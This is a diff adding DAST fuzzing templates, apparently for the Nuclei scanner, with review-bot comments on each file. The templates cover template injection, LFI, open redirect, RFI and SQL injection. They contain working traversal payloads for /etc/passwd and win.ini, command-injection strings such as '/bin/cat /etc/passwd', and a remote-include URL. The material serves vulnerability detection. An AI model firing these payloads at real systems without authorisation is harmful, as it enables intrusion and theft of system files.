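Review bot: `"%23%oa"` in the `escape` list is not a valid percent-encoding (`%oa` uses the letter o); it is almost certainly a typo for `%23%0a`, which is already present two entries earlier, so it only costs one extra request per fuzzed parameter and should be dropped. The entries `"\r"`, `"\r%20"`, `"\r\n"`, `"\r\n%20"`, `"\r\n\t"` and `"\r\t"` are double-quoted, so YAML turns them into raw CR/LF/TAB bytes; depending on how the engine places fuzz values into the query string these may be rejected client-side as invalid URL characters rather than reach the target, which is worth confirming since the percent-encoded forms of the same sequences are already covered. A `description` under `info` is also missing here, as in `cookie-injection.yaml`.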
@@ -0,0 +1,39 @@
+id: angular-client-side-template-injection
+
+info:
+ name: Angular Client-side-template-injection
+ author: theamanrawat
+ severity: high
+ reference:
+ - https://www.acunetix.com/vulnerabilities/web/angularjs-client-side-template-injection/
+ - https://portswigger.net/research/xss-without-html-client-side-template-injection-with-angularjs
+ tags: angular,csti,dast,fuzz
+
+variables:
+ first: "{{rand_int(1000, 9999)}}"
+ second: "{{rand_int(1000, 9999)}}"
+ result: "{{to_number(first)*to_number(second)}}"
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{BaseURL}}"
+ - action: waitload
+
+ payloads:
+ payload:
+ - '{{concat("{{", "{{first}}*{{second}}", "}}")}}'
+
+ fuzzing:
+ - part: query
+ type: postfix
+ mode: single
+ fuzz:
+ - "{{payload}}"
+
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{result}}"
diff --git a/http/fuzzing/dast/lfi/lfi-keyed.yaml b/http/fuzzing/dast/lfi/lfi-keyed.yaml
new file mode 100644
index 0000000000..494669e21b
--- /dev/null
+++ b/http/fuzzing/dast/lfi/lfi-keyed.yaml
@@ -0,0 +1,118 @@ +id: lfi-keyed + +info: + name: Key LFI Detection + author: pwnhxl + severity: unknown + reference: + - https://owasp.org/www-community/attacks/Unicode_Encoding + tags: dast,pathtraversal,lfi,fuzz + +variables: + fuzz: "../../../../../../../../../../../../../../../" + fuzz_urlx2_encode: "%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f" + fuzz_hex_unicode: "%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f" + fuzz_utf8_unicode: "%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF" + fuzz_utf8_unicode_x: "%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF" + fuzz_bypass_replace: ".../.../.../.../.../.../.../.../.../.../.../.../.../.../.../" + fuzz_bypass_replace_windows: '..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\' + fuzz_bypass_waf_regx: "./.././.././.././.././.././.././.././.././.././.././.././.././.././.././../" + +http: + - method: GET + path: + - "{{BaseURL}}" + + payloads: + pathtraversal: + - '{{fuzz}}etc/passwd' + - '{{fuzz}}windows/win.ini' + - '/etc/passwd%00.jpg' + - 'c:/windows/win.ini%00.jpg' + - '{{fuzz}}etc/passwd%00.jpg' + - '{{fuzz}}windows/win.ini%00.jpg' + - '{{fuzz_urlx2_encode}}etc%252fpasswd' + - '{{fuzz_urlx2_encode}}windows%252fwin.ini' + - 
'{{fuzz_hex_unicode}}etc%u002fpasswd' + - '{{fuzz_hex_unicode}}windows%u002fwin.ini' + - '{{fuzz_utf8_unicode}}etc%C0%AFpasswd' + - '{{fuzz_utf8_unicode}}windows%C0%AFwin.ini' + - '{{fuzz_utf8_unicode_x}}etc%C0AFpasswd' + - '{{fuzz_utf8_unicode_x}}windows%C0AFwin.ini' + - '{{fuzz_bypass_replace}}etc/passwd' + - '{{fuzz_bypass_replace}}windows/win.ini' + - '{{fuzz_bypass_replace_windows}}windows\win.ini' + - '{{fuzz_bypass_waf_regx}}etc/passwd' + - '{{fuzz_bypass_waf_regx}}windows/win.ini' + - './web.config' + - '../web.config' + - '../../web.config' + - './WEB-INF/web.xml' + - '../WEB-INF/web.xml' + - '../../WEB-INF/web.xml' + + fuzzing: + - part: query + mode: single + keys: + - cat + - dir + - action + - board + - date + - detail + - file + - download + - path + - folder + - prefix + - include + - page + - inc + - locate + - show + - doc + - site + - type + - view + - content + - document + - layout + - mod + - conf + - url + - img + - image + - images + fuzz: + - "{{pathtraversal}}" + + - part: query + mode: single + values: + - "^(./|../|/)|(.html|.htm|.xml|.conf|.cfg|.log|.txt|.pdf|.doc|.docx|.xls|.csv|.png|.jpg|.gif)$" + fuzz: + - "{{pathtraversal}}" + + stop-at-first-match: true + matchers-condition: or + matchers: + - type: regex + part: body + regex: + - 'root:.*?:[0-9]*:[0-9]*:' + + - type: word + part: body + words: + - 'for 16-bit app support' + + - type: regex + part: body + regex: + - '()' + + - type: regex + part: body + regex: + - '()' diff --git a/http/fuzzing/dast/lfi/linux-lfi-fuzz.yaml b/http/fuzzing/dast/lfi/linux-lfi-fuzz.yaml new file mode 100644 index 0000000000..7d66c21d9e --- /dev/null +++ b/http/fuzzing/dast/lfi/linux-lfi-fuzz.yaml 
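Review bot: The last two matchers in `lfi-keyed.yaml` are `regex: - '()'`, which matches the empty string and therefore every response body; combined with `matchers-condition: or` this makes the template report a finding on any page it fuzzes, regardless of the `root:` and `for 16-bit app support` checks above it. Either give them real patterns (they are presumably placeholders for the `web.config` / `WEB-INF/web.xml` payloads) or remove both, and set `severity` to something other than `unknown` once the matchers mean something. The `values` regex `^(./|../|/)|(.html|.htm|...)$` uses unescaped dots, so `./` matches any character followed by `/` and `.htm` matches `xhtm`; escape them if the intent is to select only path-like values. The hunk begins on the previous page line.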
@@ -0,0 +1,78 @@ +id: linux-lfi-fuzz + +info: + name: Local File Inclusion - Linux + author: DhiyaneshDK + severity: high + reference: + - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Directory%20Traversal/Intruder/directory_traversal.txt + - https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion + tags: lfi,dast,linux,fuzz + +http: + - method: GET + path: + - '{{BaseURL}}' + + payloads: + nix_fuzz: + - '/etc/passwd' + - '../../etc/passwd' + - '../../../etc/passwd' + - '/../../../../etc/passwd' + - '../../../../../../../../../etc/passwd' + - '../../../../../../../../etc/passwd' + - '../../../../../../../etc/passwd' + - '../../../../../../etc/passwd' + - '../../../../../etc/passwd' + - '../../../../etc/passwd' + - '../../../etc/passwd' + - '../../../etc/passwd%00' + - '../../../../../../../../../../../../etc/passwd%00' + - '../../../../../../../../../../../../etc/passwd' + - '/../../../../../../../../../../etc/passwd^^' + - '/../../../../../../../../../../etc/passwd' + - '/./././././././././././etc/passwd' + - '\..\..\..\..\..\..\..\..\..\..\etc\passwd' + - '..\..\..\..\..\..\..\..\..\..\etc\passwd' + - '/..\../..\../..\../..\../..\../..\../etc/passwd' + - '.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd' + - '\..\..\..\..\..\..\..\..\..\..\etc\passwd%00' + - '..\..\..\..\..\..\..\..\..\..\etc\passwd%00' + - '%252e%252e%252fetc%252fpasswd' + - '%252e%252e%252fetc%252fpasswd%00' + - '%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd' + - '%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd%00' + - '....//....//etc/passwd' + - '..///////..////..//////etc/passwd' + - '/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd' + - '%0a/bin/cat%20/etc/passwd' + - '%00/etc/passwd%00' + - '%00../../../../../../etc/passwd' + - '/../../../../../../../../../../../etc/passwd%00.jpg' + - '/../../../../../../../../../../../etc/passwd%00.html' + - 
'/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd' + - '/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd' + - '\\'/bin/cat%20/etc/passwd\\'' + - '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd' + - '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd' + - '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd' + - '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd' + - '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd' + - '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd' + - '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd' + - '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd' + + fuzzing: + - part: query + type: replace # replaces existing parameter value with fuzz payload + mode: multiple # replaces all parameters value with fuzz payload + fuzz: + - '{{nix_fuzz}}' + + stop-at-first-match: true + matchers: + - type: regex + part: body + regex: + - 'root:.*:0:0:' diff --git a/http/fuzzing/dast/lfi/windows-lfi-fuzz.yaml b/http/fuzzing/dast/lfi/windows-lfi-fuzz.yaml new file mode 100644 index 0000000000..cf5fd0a082 --- /dev/null +++ b/http/fuzzing/dast/lfi/windows-lfi-fuzz.yaml 
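Review bot: As rendered here, `'\\'/bin/cat%20/etc/passwd\\''` closes the single-quoted scalar after `\\` and leaves `/bin/cat…` dangling on the line, which a YAML parser rejects; if a literal quote inside the value is intended it needs `''` doubling or a double-quoted string, so please check the file as committed. That entry and `%0a/bin/cat%20/etc/passwd` are command-injection strings rather than traversal paths, so they sit oddly in a list matched only by `root:.*:0:0:`. Note also that `type: replace` with `mode: multiple` (per the inline comments) rewrites every query parameter at once, so a hit cannot be attributed to a single parameter; a comment saying that is the intended trade-off for request count would help. The hunk begins on the previous page line.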
@@ -0,0 +1,71 @@ +id: windows-lfi-fuzz + +info: + name: Local File Inclusion - Windows + author: pussycat0x + severity: high + tags: lfi,windows,dast,fuzz + +http: + - method: GET + path: + - '{{BaseURL}}' + + payloads: + win_fuzz: + - '\WINDOWS\win.ini' + - '\WINDOWS\win.ini' + - '\WINDOWS\win.ini%00' + - '\WINNT\win.ini' + - '\WINNT\win.ini%00' + - 'windows/win.ini%00' + - '../../windows/win.ini' + - '....//....//windows/win.ini' + - '/../../../../../../../../../../../../../../../../&location=Windows/win.ini' + - '../../../../../windows/win.ini' + - '/..///////..////..//////windows/win.ini' + - '/../../../../../../../../../windows/win.ini' + - './../../../../../../../../../../windows/win.ini' + - '/...\...\...\...\...\...\...\...\...\windows\win.ini' + - '/.../.../.../.../.../.../.../.../.../windows/win.ini' + - '/..../..../..../..../..../..../..../..../..../windows/win.ini' + - '/....\....\....\....\....\....\....\....\....\windows\win.ini' + - '\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\Windows\\\\win.ini' + - '/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cwindows/win.ini' + - '..%2f..%2f..%2f..%2fwindows/win.ini' + - '..%2f..%2f..%2f..%2f..%2fwindows/win.ini' + - '..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini' + - '/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini' + - '/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini%00' + - '..%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/windows/win.ini' + - '..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini' + - '/.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./windows/win.ini' + - '.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/windows/win.ini' + - '/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../windows/win.ini' + - '/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows/win.ini' + - '/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini' + - 
'%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin.ini' + - '%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini' + - '/%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2ewindows/win.ini/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/windows/win.ini' + - '/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows\win.ini' + - '..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini' + - '/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini' + - '%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini' + - '%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fwindows%5Cwin.ini' + + fuzzing: + - part: query + type: replace # replaces existing parameter value with fuzz payload + mode: multiple # replaces all parameters value with fuzz payload + fuzz: + - '{{win_fuzz}}' + + stop-at-first-match: true + matchers: + - type: word + part: body + words: + - "bit app support" + - "fonts" + - "extensions" + condition: and diff --git a/http/fuzzing/dast/redirect/open-redirect.yaml b/http/fuzzing/dast/redirect/open-redirect.yaml new file mode 100644 index 0000000000..10dcb4a9b2 --- /dev/null +++ b/http/fuzzing/dast/redirect/open-redirect.yaml 
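Review bot: The first two `win_fuzz` entries are both `'\WINDOWS\win.ini'`, so the first payload is sent twice for every fuzzed parameter; remove the duplicate. In `'\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\Windows\\\\win.ini'` the single quotes keep every backslash literally, so the request carries four backslashes per separator rather than the two the neighbouring `%5C%5C` entry encodes — confirm which was intended. The `condition: and` over `bit app support`, `fonts` and `extensions` is a sensible guard against a lone generic word matching.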
@@ -0,0 +1,180 @@ +id: open-redirect + +info: + name: Open Redirect Detection + author: princechaddha + severity: medium + tags: redirect,dast,fuzz + +http: + - method: GET + path: + - "{{BaseURL}}" + + payloads: + redirect: + - "evil.com" + + fuzzing: + - part: query + mode: single + keys: + - AuthState + - URL + - _url + - callback + - checkout + - checkout_url + - content + - continue + - continueTo + - counturl + - data + - dest + - dest_url + - destination + - dir + - document + - domain + - done + - download + - feed + - file + - file_name + - file_url + - folder + - folder_url + - forward + - from_url + - go + - goto + - host + - html + - http + - https + - image + - image_src + - image_url + - imageurl + - img + - img_url + - include + - langTo + - load_file + - load_url + - login_to + - login_url + - logout + - media + - navigation + - next + - next_page + - open + - out + - page + - page_url + - pageurl + - path + - picture + - port + - proxy + - r + - r2 + - redir + - redirect + - redirectUri + - redirectUrl + - redirect_to + - redirect_uri + - redirect_url + - reference + - referrer + - req + - request + - ret + - retUrl + - return + - returnTo + - return_path + - return_to + - return_url + - rt + - rurl + - show + - site + - source + - src + - target + - to + - u + - uri + - url + - val + - validate + - view + - window + - back + - cgi + - follow + - home + - jump + - link + - location + - menu + - move + - nav + - orig_url + - out_url + - query + - auth + - callback_url + - confirm_url + - destination_url + - domain_url + - entry + - exit + - forward_url + - go_to + - goto_url + - home_url + - image_link + - load + - logout_url + - nav_to + - origin + - page_link + - redirect_link + - ref + - referrer_url + - return_link + - return_to_url + - source_url + - target_url + - to_url + - validate_url + - DirectTo + - relay + + fuzz: + - "https://{{redirect}}" + + - part: query + mode: single + values: + - "https?://" # Replace HTTP URLs with alternatives + 
fuzz: + - "https://{{redirect}}" + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: regex + part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)evil\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + + - type: status + status: + - 301 + - 302 + - 307 diff --git a/http/fuzzing/dast/rfi/rfi.yaml b/http/fuzzing/dast/rfi/rfi.yaml new file mode 100644 index 0000000000..0fedee21ae --- /dev/null +++ b/http/fuzzing/dast/rfi/rfi.yaml @@ -0,0 +1,31 @@ +id: rfi + +info: + name: Remote File Inclusion + author: m4lwhere + severity: high + reference: + - https://www.invicti.com/learn/remote-file-inclusion-rfi/ + tags: rfi,dast,oast,fuzz + +http: + - method: GET + path: + - "{{BaseURL}}" + + payloads: + rfi: + - "https://rfi.nessus.org/rfi.txt" + + fuzzing: + - part: query + mode: single + fuzz: + - "{{rfi}}" + + stop-at-first-match: true + matchers: + - type: word + part: body # Confirms the PHP was executed + words: + - "NessusCodeExecTest" diff --git a/http/fuzzing/dast/sqli/cves/CVE-2022-34265.yaml b/http/fuzzing/dast/sqli/cves/CVE-2022-34265.yaml new file mode 100644 index 0000000000..de035db7ce --- /dev/null +++ b/http/fuzzing/dast/sqli/cves/CVE-2022-34265.yaml 
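Review bot: The status matcher accepts only 301, 302 and 307, so a server that answers with 303 or 308 and a matching `Location` header is never reported even though the regex matcher fired; add `- 303` and `- 308` to the `status` list. The redirect target `evil.com` is a real third-party domain, so scanned applications (and their logs, proxies and follow-up fetches) are pointed at infrastructure the operator does not control; an operator-owned host, e.g. `{{interactsh-url}}` as the sibling blind-ssrf template uses, keeps that traffic in hand. The second rule's comment says "Replace HTTP URLs" but no `type` is set; if replace is the engine default, say so in the comment so the two rules read consistently.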
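Review bot: `tags: rfi,dast,oast,fuzz` advertises OAST, but the template never uses `{{interactsh-url}}`; detection depends entirely on the target being able to reach `https://rfi.nessus.org/rfi.txt` and on that host still serving `NessusCodeExecTest`, so if either changes the template silently stops matching. Either drop the `oast` tag or add an interactsh-based payload as a second signal, and document the dependency above `rfi:` with `# relies on rfi.nessus.org staying online and on the target having outbound HTTPS; no match otherwise`.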
@@ -0,0 +1,45 @@ +id: CVE-2022-34265 + +info: + name: Django - SQL injection + author: princechaddha + severity: critical + description: | + An issue was discovered in Django 3.2 before 3.2.14 and 4.0 before 4.0.6. The Trunc() and Extract() database functions are subject to SQL injection if untrusted data is used as a kind/lookup_name value. Applications that constrain the lookup name and kind choice to a known safe list are unaffected. + reference: + - https://github.com/vulhub/vulhub/tree/master/django/CVE-2022-34265 + - https://nvd.nist.gov/vuln/detail/CVE-2022-34265 + - https://www.djangoproject.com/weblog/2022/jul/04/security-releases/ + - https://docs.djangoproject.com/en/4.0/releases/security/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-34265 + cwe-id: CWE-89 + tags: sqli,dast,vulhub,cve,cve2022,django,fuzz + +variables: + rand_string: '{{rand_text_alpha(15, "abc")}}' + +http: + - method: GET + path: + - "{{BaseURL}}" + + fuzzing: + - part: query + fuzz: + - "test'{{rand_string}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'syntax error at or near "{{rand_string}}"' + - 'LINE 1: SELECT DATE_TRUNC' + condition: and + + - type: status + status: + - 500 diff --git a/http/fuzzing/dast/sqli/error-based.yaml b/http/fuzzing/dast/sqli/error-based.yaml new file mode 100644 index 0000000000..2545ba8684 --- /dev/null +++ b/http/fuzzing/dast/sqli/error-based.yaml 
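Review bot: The second body word `LINE 1: SELECT DATE_TRUNC` (and `syntax error at or near`) is PostgreSQL error text, so a Django deployment on another backend, or one that does not expose database errors in the response body, is reported as clean even when affected; the description's scope of `Trunc()`/`Extract()` does not mention this. Add `# detection needs a PostgreSQL backend whose error text reaches the response body` above the `words:` list, and consider `stop-at-first-match: true` for consistency with the sibling fuzzing templates.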
@@ -0,0 +1,492 @@ +id: sqli-error-based + +info: + name: Error based SQL Injection + author: geeknik,pdteam + severity: critical + description: | + Direct SQL Command Injection is a technique where an attacker creates or alters existing SQL commands to expose hidden data, + or to override valuable ones, or even to execute dangerous system level commands on the database host. + This is accomplished by the application taking user input and combining it with static parameters to build an SQL query . + tags: sqli,error,dast,fuzz + +http: + - method: GET + path: + - "{{BaseURL}}" + + payloads: + injection: + - "'" + - "\"" + - ";" + + fuzzing: + - part: query + type: postfix + fuzz: + - "{{injection}}" + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Adminer" + negative: true + # False Positive + + - type: regex + regex: + # MySQL + - "SQL syntax.*?MySQL" + - "Warning.*?\\Wmysqli?_" + - "MySQLSyntaxErrorException" + - "valid MySQL result" + - "check the manual that (corresponds to|fits) your MySQL server version" + - "Unknown column '[^ ]+' in 'field list'" + - "MySqlClient\\." + - "com\\.mysql\\.jdbc" + - "Zend_Db_(Adapter|Statement)_Mysqli_Exception" + - "Pdo[./_\\\\]Mysql" + - "MySqlException" + - "SQLSTATE\\[\\d+\\]: Syntax error or access violation" + # MariaDB + - "check the manual that (corresponds to|fits) your MariaDB server version" + # Drizzle + - "check the manual that (corresponds to|fits) your Drizzle server version" + # MemSQL + - "MemSQL does not support this type of query" + - "is not supported by MemSQL" + - "unsupported nested scalar subselect" + # PostgreSQL + - "PostgreSQL.*?ERROR" + - "Warning.*?\\Wpg_" + - "valid PostgreSQL result" + - "Npgsql\\." 
+ - "PG::SyntaxError:" + - "org\\.postgresql\\.util\\.PSQLException" + - "ERROR:\\s\\ssyntax error at or near" + - "ERROR: parser: parse error at or near" + - "PostgreSQL query failed" + - "org\\.postgresql\\.jdbc" + - "Pdo[./_\\\\]Pgsql" + - "PSQLException" + # Microsoft SQL Server + - "Driver.*? SQL[\\-\\_\\ ]*Server" + - "OLE DB.*? SQL Server" + - "\\bSQL Server[^<"]+Driver" + - "Warning.*?\\W(mssql|sqlsrv)_" + - "\\bSQL Server[^<"]+[0-9a-fA-F]{8}" + - "System\\.Data\\.SqlClient\\.SqlException\\.(SqlException|SqlConnection\\.OnError)" + - "(?s)Exception.*?\\bRoadhouse\\.Cms\\." + - "Microsoft SQL Native Client error '[0-9a-fA-F]{8}" + - "\\[SQL Server\\]" + - "ODBC SQL Server Driver" + - "ODBC Driver \\d+ for SQL Server" + - "SQLServer JDBC Driver" + - "com\\.jnetdirect\\.jsql" + - "macromedia\\.jdbc\\.sqlserver" + - "Zend_Db_(Adapter|Statement)_Sqlsrv_Exception" + - "com\\.microsoft\\.sqlserver\\.jdbc" + - "Pdo[./_\\\\](Mssql|SqlSrv)" + - "SQL(Srv|Server)Exception" + - "Unclosed quotation mark after the character string" + # Microsoft Access + - "Microsoft Access (\\d+ )?Driver" + - "JET Database Engine" + - "Access Database Engine" + - "ODBC Microsoft Access" + - "Syntax error \\(missing operator\\) in query expression" + # Oracle + - "\\bORA-\\d{5}" + - "Oracle error" + - "Oracle.*?Driver" + - "Warning.*?\\W(oci|ora)_" + - "quoted string not properly terminated" + - "SQL command not properly ended" + - "macromedia\\.jdbc\\.oracle" + - "oracle\\.jdbc" + - "Zend_Db_(Adapter|Statement)_Oracle_Exception" + - "Pdo[./_\\\\](Oracle|OCI)" + - "OracleException" + # IBM DB2 + - "CLI Driver.*?DB2" + - "DB2 SQL error" + - "\\bdb2_\\w+\\(" + - "SQLCODE[=:\\d, -]+SQLSTATE" + - "com\\.ibm\\.db2\\.jcc" + - "Zend_Db_(Adapter|Statement)_Db2_Exception" + - "Pdo[./_\\\\]Ibm" + - "DB2Exception" + - "ibm_db_dbi\\.ProgrammingError" + # Informix + - "Warning.*?\\Wifx_" + - "Exception.*?Informix" + - "Informix ODBC Driver" + - "ODBC Informix driver" + - "com\\.informix\\.jdbc" + - 
"weblogic\\.jdbc\\.informix" + - "Pdo[./_\\\\]Informix" + - "IfxException" + # Firebird + - "Dynamic SQL Error" + - "Warning.*?\\Wibase_" + - "org\\.firebirdsql\\.jdbc" + - "Pdo[./_\\\\]Firebird" + # SQLite + - "SQLite/JDBCDriver" + - "SQLite\\.Exception" + - "(Microsoft|System)\\.Data\\.SQLite\\.SQLiteException" + - "Warning.*?\\W(sqlite_|SQLite3::)" + - "\\[SQLITE_ERROR\\]" + - "SQLite error \\d+:" + - "sqlite3.OperationalError:" + - "SQLite3::SQLException" + - "org\\.sqlite\\.JDBC" + - "Pdo[./_\\\\]Sqlite" + - "SQLiteException" + # SAP MaxDB + - "SQL error.*?POS([0-9]+)" + - "Warning.*?\\Wmaxdb_" + - "DriverSapDB" + - "-3014.*?Invalid end of SQL statement" + - "com\\.sap\\.dbtech\\.jdbc" + - "\\[-3008\\].*?: Invalid keyword or missing delimiter" + # Sybase + - "Warning.*?\\Wsybase_" + - "Sybase message" + - "Sybase.*?Server message" + - "SybSQLException" + - "Sybase\\.Data\\.AseClient" + - "com\\.sybase\\.jdbc" + # Ingres + - "Warning.*?\\Wingres_" + - "Ingres SQLSTATE" + - "Ingres\\W.*?Driver" + - "com\\.ingres\\.gcf\\.jdbc" + # FrontBase + - "Exception (condition )?\\d+\\. Transaction rollback" + - "com\\.frontbase\\.jdbc" + - "Syntax error 1. Missing" + - "(Semantic|Syntax) error [1-4]\\d{2}\\." 
+ # HSQLDB + - "Unexpected end of command in statement \\[" + - "Unexpected token.*?in statement \\[" + - "org\\.hsqldb\\.jdbc" + # H2 + - "org\\.h2\\.jdbc" + - "\\[42000-192\\]" + # MonetDB + - "![0-9]{5}![^\\n]+(failed|unexpected|error|syntax|expected|violation|exception)" + - "\\[MonetDB\\]\\[ODBC Driver" + - "nl\\.cwi\\.monetdb\\.jdbc" + # Apache Derby + - "Syntax error: Encountered" + - "org\\.apache\\.derby" + - "ERROR 42X01" + # Vertica + - ", Sqlstate: (3F|42).{3}, (Routine|Hint|Position):" + - "/vertica/Parser/scan" + - "com\\.vertica\\.jdbc" + - "org\\.jkiss\\.dbeaver\\.ext\\.vertica" + - "com\\.vertica\\.dsi\\.dataengine" + # Mckoi + - "com\\.mckoi\\.JDBCDriver" + - "com\\.mckoi\\.database\\.jdbc" + - "<REGEX_LITERAL>" + # Presto + - "com\\.facebook\\.presto\\.jdbc" + - "io\\.prestosql\\.jdbc" + - "com\\.simba\\.presto\\.jdbc" + - "UNION query has different number of fields: \\d+, \\d+" + # Altibase + - "Altibase\\.jdbc\\.driver" + # MimerSQL + - "com\\.mimer\\.jdbc" + - "Syntax error,[^\\n]+assumed to mean" + # CrateDB + - "io\\.crate\\.client\\.jdbc" + # Cache + - "encountered after end of query" + - "A comparison operator is required here" + # Raima Database Manager + - "-10048: Syntax error" + - "rdmStmtPrepare\\(.+?\\) returned" + # Virtuoso + - "SQ074: Line \\d+:" + - "SR185: Undefined procedure" + - "SQ200: No table " + - "Virtuoso S0002 Error" + - "\\[(Virtuoso Driver|Virtuoso iODBC Driver)\\]\\[Virtuoso Server\\]" + condition: or + + extractors: + - type: regex + name: mysql + regex: + - "SQL syntax.*?MySQL" + - "Warning.*?\\Wmysqli?_" + - "MySQLSyntaxErrorException" + - "valid MySQL result" + - "check the manual that (corresponds to|fits) your MySQL server version" + - "Unknown column '[^ ]+' in 'field list'" + - "MySqlClient\\." 
